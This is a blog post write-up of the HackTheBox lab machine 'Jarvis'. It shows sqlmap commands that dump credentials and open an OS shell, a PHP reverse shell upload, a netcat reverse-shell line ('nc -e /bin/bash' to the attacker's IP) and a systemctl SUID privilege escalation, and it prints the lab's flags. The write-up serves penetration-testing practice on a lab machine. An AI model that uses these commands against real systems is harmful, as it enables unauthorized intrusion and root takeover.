<!DOCTYPE html>
<html lang="en" mode="dark">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <script>
        window.dataLayer = window.dataLayer || [];

        function gtag() {
            dataLayer.push(arguments);
        }
        gtag('js', new Date());
        gtag('config', 'UA-175469707-1');
    </script>
    <title>Jarvis — HackTheBox Writeup | Mr Akuma</title>
    <meta name="generator" content="Jekyll v3.9.0" />
    <meta property="og:title" content="Bypassing malware detection" />
    <meta name="author" content="Mr Akuma" />
    <meta property="og:locale" content="en_US" />
    <meta name="description"
        content="The information provided in this site is for educational purposes regarding pentesting. The author of the site will not be held any responsibility for any misuse of the information from this site." />
    <meta property="og:description"
        content="The information provided in this site is for educational purposes regarding pentesting. The author of the site will not be held any responsibility for any misuse of the information from this site." />

    <link rel="icon" href="../../images/title.jpeg" />

    <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license -->
    <link rel="shortcut icon" href="../../img/favicon.ico" type="image/x-icon">
    <link rel="icon" href="../../img/favicon.ico" type="image/x-icon">
    <meta name="msapplication-TileColor" content="#ffffff">
    <meta name="theme-color" content="#ffffff">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
    <link rel="dns-prefetch" href="https://fonts.gstatic.com">
    <link rel="dns-prefetch" href="cdn.jsdelivr.net">
    <link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
        integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
        integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"
        integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous">
    <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed -->
    <link rel="preload" as="style" href="../../css/post.css">
    <link rel="stylesheet" href="../../css/post.css">
    <link rel="preload" as="style" href="../../css/bootstrap-toc.min.css">
    <link rel="stylesheet" href="../../css/bootstrap-toc.min.css" />
    <link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1"
        integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1"
        integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js"
        async></script>
    <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed -->
    <script src="../../js/post.min.js" async></script>
    <script src="../../js/app.js" defer></script>

<body data-spy="scroll" data-target="#toc">
    <div id="sidebar" class="d-flex flex-column">
        <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License -->
        <div id="nav-wrapper">
            <div id="profile-wrapper" class="d-flex flex-column">
                <div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img
                            src="../../images/title.jpeg" alt="avatar" onerror="this.style.display='none'">
                    </a></div>
                <div class="profile-text mt-3">
                    <div class="site-title"> <a href="/">Mr Akuma</a></div>
                    <div class="site-subtitle font-italic">Publish write-ups from various pentesting platforms</div>
                </div>
            </div>
            <ul class="nav flex-column">
                <li class="nav-item d-flex justify-content-center "> <a href="../../index.html"
                        class="nav-link d-flex justify-content-center align-items-center w-100"> <i
                            class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li>

                <li class="nav-item d-flex justify-content-center "> <a href="../../whoami.html"
                        class="nav-link d-flex justify-content-center align-items-center w-100"> <i
                            class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>WHOAMI</span> </a></li>
            </ul>
        </div>
        <div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a
            href="https://github.com/akshay1729" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a
            href="https://twitter.com/Akshayjain890" target="_blank"> <i class="fab fa-twitter"></i> </a> <a
            href=" javascript:window.open('mailto:' + ['Akshayjain5','protonmail.com'].join('@'))"><i
               class="fas fa-envelope"></i> </a> <a href="https://www.linkedin.com/in/akshay-jain-533a79111/"> <i
               class="fab fa-linkedin"></i> </a> <a href="https://www.hackthebox.eu/profile/189220"> <i
               class="fas fa-cube"></i> </a></div>

    </div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License -->
    <div id="topbar-wrapper" class="row justify-content-center topbar-down">
        <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb">
                <span> <a href="../../index.html"> Writeup </a> </span> <span>Jarvis Hack The Box</span> </span> <i id="sidebar-trigger"
                class="fas fa-bars fa-fw"></i>
            <div id="topbar-title"> Writeup</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span
                id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input
                    class="form-control" id="search-input" type="search" placeholder="Search..."> <i
                    class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span
                id="search-cancel">Cancel</span>
        </div>
    </div>
    <div id="main-wrapper">
        <div id="main">
            <div class="row">
                <div id="post-wrapper" class="col-12 col-lg-11 col-xl-8">
                    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">
                        <h1 data-toc-skip>Jarvis - HackTheBox Writeup</h1>
                        <div class="post-meta text-muted d-flex flex-column">
                            <div> Posted
                                <span class="timeago " data-toggle="tooltip" data-placement="bottom"
                                    title="Sun, Aug 4, 2019, 10:00 PM +0530"> Aug 4<i
                                        class="unloaded">2019-08-04T20:00:00+05:30</i> </span> by <span class="author">
                                    Mr Akuma </span></div>
                            <div> Updated
                                <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License -->
                                <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom"
                                    title="Sun, Aug 4, 2019, 10:00 PM +0530"> Sep 9 <i
                                        class="unloaded">2019-08-04T20:00:00+05:30</i> </span></div>
                        </div>
                        <div class="post-content"> <img src="cover.png">
                            <blockquote>
                                <p><strong>The information provided in this site is for educational purposes regarding
                                        pentesting. The author of the site will not be held any responsibility for any
                                        misuse of the information from this site.</strong></p>
                            </blockquote>
                            <h2 id="introduction"><strong><span style="color:#ff5555">Introduction</span></strong></h2>
                            <hr>
                            <p>Jarvis is a Norman French surname (last name) linked to Saint Gervasius. Its Latin meaning is “He who is skilled with a spear.”
                            </p>
                            <hr>
                            <p>Jarvis was a basic and fun box. I’ll begin by finding an SQLi in one of the site pages and get a fundamental shell utilizing sqlmap and afterwards sidestep a channel on a sudo record to get to the client banner. To get to the root, I’ll misuse a suid paired to acquire root shell</p>
                            <h2 id="enumeration"><strong><span style="color:#ff5555">Enumeration: NMAP</span></strong></h2>
                            <hr>
                            <p>The primary activity is to figure out what services are running on the objective IP address by executing Nmap against 10.10.10.143 IP.</p>
                            <hr>
                            <p> <code class="language-plaintext highlighter-rouge">Akuma@kali:~$ nmap -T4 -A -O -v -p - 10.10.10.143</code></p>
                            <hr>
                            <p><img src="1.png"></p>
                            <p>The Nmap scan reveals 3 running services:
                            <br> -SSH on port 22,
                            <br> -Apache 2.4.25 on port 80 and 64999</p>
                            <h2 id="dirbuster"><strong><span style="color:#ff5555">Dirbuster</span></strong></h2>
                            <hr>
                            <p>We use the tool “Dirbuster” to scan the webserver to enumerate different files and folders. I was able to find the PHPMyAdmin version which is v4.8.0 that is installed under <span style="color:black;" class="highlighter-rouge"> http://10.10.10.143/phpmyadmin,</span> which is exploitable via Local File.</p>
                            <hr>
                            <p><img src="2.png"></p>
                            <hr>
                            <p>The port 64999 always shows: so, its a rabbit hole</p>
                            <p><img src="3.png"></p>
                            <hr>
                            <h2 id="sqlmap"><strong><span style="color:#ff5555">SqlMap</span></strong></h2>
                            <p>Reading the HTML or navigating through the page you will eventually find a URL like this</p>
                            <p><img src="4.png"></p>
                            <p>Attempting SQL injection manually through the URL bar didn’t help. In this instance, so I have used sqlmap to do this task.</p>
                            <hr>
                            <p>After a few trials of play with that parameter, I could found that it is vulnerable to SQL Injection.</p>
                            <hr>
                            <p><code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143:80/room.php?cod=1 — random-agent — level 1 — risk 1 — hostname — current-user — users — passwords — batch</code></p>
                            <p><img src="5.png"></p>
                            <hr>
                            <p>and by this, I was able to get the credentials
                            </p>
                            <p>the sqlmap has successfully found the password which can be used to log in the PHPmyadmin page.
                            </p>
                            <p><img src="6.png"></p>
                            <hr>
                            <p>Now using sqlmap we can get a shell to Jarvis to do that I have used below command</p>
                            <p><code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143:80 — crawl=3 — random-agent — level1 — risk 1 — os-shell — batch</code></p>
                            <hr>
                            <h2 id="user"><strong><span style="color:#ff5555">User.txt</span></strong></h2>
                            <p>We still can’t read the flag but we can execute commands inside the Host we can upload a PHP reverse shell and execute.</p>
                            <p><img src="7.png"></p>
                            <hr>
                            <p>I have downloaded pentest monkey PHP reverse shell on the host:</p>
                            <p><img src="8.png"></p>
                            <hr>
                            <p>Accessing this shell opens a real shell to the system which is www-data now to escalate the privileges on the system I have used <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite"> PEASS (Privilege Escalation Awesome Scripts SUITE)</a></p>
                            <hr>
                            <p><img src="9.png"></p>
                            <p>It is possible to execute this script as pepper.
                            </p>
                            <p>Executing it, you will find that there is an option to ping an IP address:</p>
                            <hr>
                            <p>To get a reverse connection I have used the below script:
                            <br>
                            <code class="language-plaintext highlighter-rouge">script: echo “nc -e /bin/bash 10.10.14.13 5566” > rev2.sh</code>
                            </p>
                            <hr>
                            <p>And now it can be called from the script created earlier:</p>
                            <p><code class="language-plaintext highlighter-rouge">sudo -u pepper /var/www/Admin-Utilities/simpler.py -p</code></p>
                            <p><img src="10.png"></p>
                            <p>owning user: as pepper, I was able to read the user.txt file: <span style="color:black;" class="highlighter-rouge">2afa36c4f05b37b34259c93551f5c44f</span> (flag)</p>
                            <hr>
                            <h2 id="root"><strong><span style="color:#ff5555">Root.txt</span></strong></h2>
                            <p>Executing linpe as pepper I have easily found the root flag by privileges exploiting the SUID bit of systemctl.</p>
                            <p>To exploit it you have to create a new .service file:</p>
                            <p><code class="language-plaintext highlighter-rouge">pepper@jarvis:~$ cat /home/pepper/suidpe.service</code></p>
                            <p><img src="11.png"></p>
                            <hr>
                            <p>This service file will execute a script whenever it is started</p>
                            <p><code class="language-plaintext highlighter-rouge">pepper@jarvis:~$ cat /home/pepper/pe.sh</code></p>
                            <p><span style="color:black;" class="highlighter-rouge">cp /bin/bash /home/pepper/b; chmod +s /home/pepper/b</span></p>
                            <hr>
                            <p>Finally create and execute the new service :</p>
                            <p><code class="language-plaintext highlighter-rouge">pepper@jarvis:~$ systemctl link /home/pepper/suidpe.service</code></p>
                            <p><code class="language-plaintext highlighter-rouge">pepper@jarvis:~$ systemctl enable — now</code></p>
                            <p><span style="color:black;" class="highlighter-rouge">/home/pepper/suidpe.service</span></p>
                            <hr>
                            <p>pepper@jarvis:~$ systemctl start suidpe.service</p>
                            <p>This will create a file /home/pepper/b (a copy of /bin/bash with the SUID set</p>
                            <p>upon executing it we get the root, and we can easly read the flag:</p>
                            <p><code class="language-plaintext highlighter-rouge">pepper@jarvis:~$ /home/pepper/b -p</code></p>
                            <hr>
                            <p>b-4.4# cat /root/root.txt</p>
                            <p><span span style="color:black;" class="highlighter-rouge">d41d8cd98f00b204e9800998ecf84271</span>(the root flag)</p>
                        </div>
                        <div class="post-tail-wrapper text-muted">
                            <div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a
                                    href="../../index.html">WriteUP</a></div>
                            <div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i>
                                <a class="post-tag no-text-decoration">Hacking</a>
                                <a class="post-tag no-text-decoration">Privilege Escalation</a>
                                <a class="post-tag no-text-decoration">HackTheBox</a>
                                <a class="post-tag no-text-decoration">SqlMap</a>
                                <a class="post-tag no-text-decoration">Exploitation</a>
                                </div>
                        </div>
                    </div>
                </div>
                <!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License -->
                <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">
                    <div id="toc-wrapper" class="pl-0 pr-4 mb-5">
                        <h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3>
                        <nav id="toc" data-toggle="toc"></nav>
                    </div>
                </div>
            </div>
            <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script>
            <script type="text/javascript">
                const imgs = document.querySelectorAll('#post-wrapper img');
                const observer = lozad(imgs);
                observer.observe();
            </script>
            <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License -->
            <footer class="d-flex w-100 justify-content-center">
                <div class="d-flex justify-content-between align-items-center">
                    <div class="footer-left">
                        <script src="https://www.hackthebox.eu/badge/189220"></script>
                </div>
            </footer>
        </div>
        <!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License -->
        <div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
            <div class="col-12 col-xl-11 post-content">
                <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
            </div>
        </div>
    </div>
    <div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i
            class="fas fa-angle-up"></i> </a>
    <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License -->
    <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License -->
    <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script>
    <script>
        SimpleJekyllSearch({
            searchInput: document.getElementById('search-input'),
            resultsContainer: document.getElementById('search-results'),
            json: '/assets/js/data/search.json',
            searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="corshinecorshine.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>',
            noResultsText: '<p class="mt-5">Oops! No result founds.</p>'
        });
    </script>
